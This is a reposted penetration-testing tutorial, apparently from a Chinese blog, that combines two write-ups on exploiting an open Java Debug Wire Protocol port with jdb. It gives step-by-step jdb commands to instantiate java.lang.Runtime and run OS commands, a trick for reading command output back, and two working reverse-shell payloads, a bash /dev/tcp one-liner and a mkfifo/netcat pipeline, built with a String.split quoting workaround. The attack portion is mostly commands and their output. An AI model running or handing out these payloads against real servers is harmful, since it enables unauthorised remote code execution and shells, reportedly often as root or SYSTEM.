java debug 渗透测试

简介: http://blog.silentsignal.eu/2014/02/09/jdb-tricks-hacking-java-debug-wire/ http://pki.
http://blog.silentsignal.eu/2014/02/09/jdb-tricks-hacking-java-debug-wire/
http://pki.fedoraproject.org/wiki/Debugging_Dogtag
http://wiki.jerrypeng.me/source-notes-jetty.html
JDWP Arbitrary Java Code Execution Exploitation
===============================================
Java Debugging Wire Protocol (JDWP) is the lowlevel protocol used for
communication between a debugger and a Java Virtual Machine (JVM) as outlined in
the Java Platform Debugger Architecture. It is often used to facilitate remote
debugging of a JVM over TCP/IP and can be identified by the initial protocol
handshake ascii string "JDWP-Handshake", sent first by the client and responded
to by the server. "jdb" is a proof-of-concept JDWP capable debugger included in
Oracle JDK and OpenJDK which can be used to interact with remote JDWP capable
services. Typically this service runs on TCP port 8000 however it can be found
to run on arbitrary TCP ports and is sometimes found enabled inadvertantly on
servers running Java services. It is possible to use this utility to exploit 
remote JVM's and execute arbitrary Java code. An example shown here outlines
how to leverage this weakness to execute arbitrary host OS commands in the
context of the JVM.

$ jdb -attach x.x.x.x:8000
Set uncaught java.lang.Throwable
Set deferred uncaught java.lang.Throwable
Initializing jdb ...
> 

Information leaks can be leveraged to determine details about the remote OS
platform and Java installation configuration through the "classpath" command.

> classpath
base directory: C:\Windows\system32
classpath: [ ** MASKED ** list of jar's loaded in remote JVM ]
bootclasspath: [ ** MASKED ** list of JRE paths ]
> 

jdb is capable of performing remote object creation and method invokation from
within the CLI using the "print" "dump" and "eval" commands with the "new"
keyword. To determine the classes and methods available use the "classes" and
then "methods" on the corrosponding class. 

> classes
...
java.lang.Runtime
...
> methods java.lang.Runtime
...
java.lang.Runtime exec(java.lang.String[])
...

It is often necessary to set the JDB context to be within a suspended thread or
breakpoint before attempting to create a new remote object class. Using the
"trace go methods" function can be used to identify a candidate for a breakpoint
and then "stop in your.random.class.method()" to halt the execution of a running
thread. When the execution is halted you can use "print new" to create your
class and invoke methods such as in the following example.

Breakpoint hit: "thread=threadname",your.random.class.method(), line=745 bci=0
threadname[1] print new java.lang.Runtime().exec("cmd.exe /c dir")
new java.lang.Runtime().exec("cmd.exe /c dir") = "java.lang.ProcessImpl@918502"
threadname[1] cont
> 

Exploitation success will be determined from the output of the JDB process as
functions returning "null" or errors about "unsuspended thread state" would
indicate that exploitation was unsuccessful, however in the example above we can
see that the java created a new object "java.lang.ProcessImpl@918502" indicating
the "cmd.exe /c dir" was executed with success. On Linux this may need adjusting
to "java.lang.Runtime.getRuntime().exec()" however see the method / class
enumeration when attempting to exploit this flaw.


Your java will be executed in the context of the running JVM application, this
has been identified on services running as both "root" (*nix) and "SYSTEM"
(win32) in the wild. 


 -- prdelka
 
 
 
 
 
 
 
 

During a recent project we found a Java Debug Wire Protocol interface open at a server. I was a bit surprised when I was able to attach to it using JDB, the Java debugger – this was too easy. Or was it?

Prdelka has a pretty decent write-up on the exploitation over JDWP: you can basically instantiate any class from the classpath (and you can set the classpath yourself with the -D switch of jdb) and luckily you can also directly call the exec() method of the java.lang.Runtime class practically achieving remote code execution. It goes like this:

print new java.lang.Runtime().exec("ls")
 new java.lang.Runtime().exec("ls") = "java.lang.UNIXProcess@481adc30"

Well, that’s great, how about getting the output back or even an interactive shell maybe? That’s when things go painfully Java.

If you open the documentation of JDB you don’t see too much features to work with: a handful of commands, no scripting support and as it turns out the expression syntax  is also undocumented.

After a bit of experimenting you’ll find that although you can instantiate classes and call their methods, there is no easy way for storing the actual object instances which is pretty bad since Java requires a ton of boilerplate code for pretty much every basic operation. For example getting back one line of exec() output looks like this:

print new java.lang.String(new java.io.BufferedReader( \
new java.io.InputStreamReader( \ 
new java.lang.Runtime().exec("id").getInputStream())).readLine())
 new java.lang.String(new java.io.BufferedReader(new java.io.InputStreamReader(new java.lang.Runtime().exec("id").getInputStream())).readLine()) = "uid=1000(b) gid=1000(b) groups=1000(b)"

Still, I couldn’t figure a way to put this whole thing in a loop to read more lines. What about getting a reverse shell and getting rid of all the InputStream handling? Netcat was available on the target but without the -e option (aka GAPING_SECURITY_HOLE) enabled. There are of course a ton of other options to achieve the same result, but they all require either shell stream redirection or at least quoting. Since Runtime.exec() passess the commands directly to the OS, shell syntax doesn’t work immediately and also quotation marks are handled in a rather weird way by the JDB shell, so things like exec(“bash -c \”your > command\”") don’t work as expected. 

One possible solution to come over these limitations is to write out a shell script and then invoke it:

print new java.io.PrintWriter(new java.io.PrintWriter("/tmp/S2.sh"),true).println("bash -i >& /dev/tcp/10.0.0.1/4444 0>&1")

Note that since you can’t close() the PrintWriter instance you have to enable automatic flush that actually requires a PrintWriter instance to be wrapped by an other one…

The more elegant solution is to use Runtime.exec(String[]) interface and let the API take care of quotation. The problem is that it seems you can’t simply declare an array in the jdb shell. Luckily though you can invoke the split() method on a freshly instantiated String object:

print new java.lang.Runtime().exec(new java.lang.String("bashS2-cS2mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4444 >/tmp/f").split("S2"))

So we successfully got our interactive shell with the privileges of the application server. Also, by this time PZ got root in a totally different way on the same server, more about that in a later post :)

If you know other useful tricks for JDB, don’t hesitate to share it in the comments!


目录
相关文章
|
24天前
|
Java 计算机视觉
java实现人脸识别源码【含测试效果图】——前台页面层(login.jsp)
java实现人脸识别源码【含测试效果图】——前台页面层(login.jsp)
12 0
|
11天前
|
Web App开发 前端开发 Java
《手把手教你》系列技巧篇(九)-java+ selenium自动化测试-元素定位大法之By name(详细教程)
【4月更文挑战第1天】 这篇教程介绍了如何使用Selenium Webdriver通过name属性来定位网页元素,作为系列教程的一部分,之前讲解了id定位,后续还会有其他六种定位方法。文中以百度搜索为例,详细说明了定位搜索框(name="wd")并输入关键词“北京宏哥”的步骤,包括手动操作流程、编写自动化脚本以及代码实现。此外,还提供了查看和理解Selenium源码的方法,强调了`open implementation`选项用于查看方法的具体实现。整个过程旨在帮助读者学习Selenium的元素定位,并实践自动化测试。
37 0
|
23天前
|
Web App开发 存储 JavaScript
《手把手教你》系列技巧篇(八)-java+ selenium自动化测试-元素定位大法之By id(详细教程)
【2月更文挑战第17天】本文介绍了Web自动化测试的核心——元素定位。文章首先强调了定位元素的重要性,指出找不到元素则无法进行后续操作。Selenium提供八种定位方法,包括By id、name、class name等。其中,By id是最简单快捷的方式。文章还阐述了自动化测试的步骤:定位元素、操作元素、验证结果和记录测试结果。此外,讨论了如何选择定位方法,推荐优先使用简单稳定的方式,如id,其次考虑其他方法。最后,作者提供了Chrome浏览器的开发者工具作为定位元素的工具,并给出了通过id定位的代码示例。
48 0
|
6天前
|
前端开发 Java 测试技术
《手把手教你》系列技巧篇(十二)-java+ selenium自动化测试-元素定位大法之By link text(详细教程)
【4月更文挑战第4天】本文介绍了link text在自动化测试中的应用。Link text是指网页中链接的文字描述,点击可跳转至其他页面。文章列举了8种常用的定位方法,其中着重讲解了link text定位,并通过实例展示了如何使用Java代码实现点击百度首页的“奥运奖牌榜 最新排名”链接,进入相应页面。如果link text不准确,则无法定位到元素,这说明linkText是精准匹配,而非模糊匹配。文章还提到了partial link text作为link text的模糊匹配版本,将在后续内容中介绍。
31 4
|
5天前
|
Java 测试技术
SpringBoot整合单元测试&&关于SpringBoot单元测试找不到Mapper和Service报java.lang.NullPointerException的错误
SpringBoot整合单元测试&&关于SpringBoot单元测试找不到Mapper和Service报java.lang.NullPointerException的错误
12 0
|
5天前
|
XML 前端开发 Java
《手把手教你》系列技巧篇(十四)-java+ selenium自动化测试-元素定位大法之By xpath上卷(详细教程)
【4月更文挑战第6天】按宏哥计划,本文继续介绍WebDriver关于元素定位大法,这篇介绍定位倒数二个方法:By xpath。xpath 的定位方法, 非常强大。使用这种方法几乎可以定位到页面上的任意元素。xpath 是XML Path的简称, 由于HTML文档本身就是一个标准的XML页面,所以我们可以使用Xpath 的用法来定位页面元素。XPath 是XML 和Path的缩写,主要用于xml文档中选择文档中节点。基于XML树状文档结构,XPath语言可以用在整棵树中寻找指定的节点。
35 0
|
24天前
|
Java
使用java底层实现邮件的发送(含测试,源码)
使用java底层实现邮件的发送(含测试,源码)
8 0
|
24天前
|
Web App开发 安全 Java
《手把手教你》系列技巧篇(七)-java+ selenium自动化测试-宏哥带你全方位吊打Chrome启动过程(详细教程)
【2月更文挑战第16天】本文介绍了如何通过查看源码理解Selenium启动Chrome浏览器的过程。首先,展示了启动Chrome的Java代码,包括设置系统属性、创建WebDriver实例、最大化窗口、设置隐性等待、打开网站、获取页面标题以及关闭浏览器。文章还讲解了包(package)、import导入、setProperty设置系统属性、WebDriver接口、driver实例、manage方法、get方法加载网页以及quit方法退出浏览器的基本概念和作用。适合没有Java基础的读者了解Selenium与Java的交互方式。
45 3
|
2天前
|
前端开发 JavaScript Java
《手把手教你》系列技巧篇(十七)-java+ selenium自动化测试-元素定位大法之By css上卷(详细教程)
【4月更文挑战第9天】本文介绍了CSS定位方式的使用,包括它的优势和8种常用的定位方法。CSS定位相比XPath定位更快、更稳定。文章通过示例详细讲解了如何使用CSS定位元素,包括通过id、name、class name、tag name、link text、partial link text以及XPath进行定位。还提供了Java代码示例来演示如何在自动化测试中使用这些定位方法。
30 1
|
22天前
|
Java
java面向对象高级分层实例_测试类(main方法所在的类)
java面向对象高级分层实例_测试类(main方法所在的类)
8 1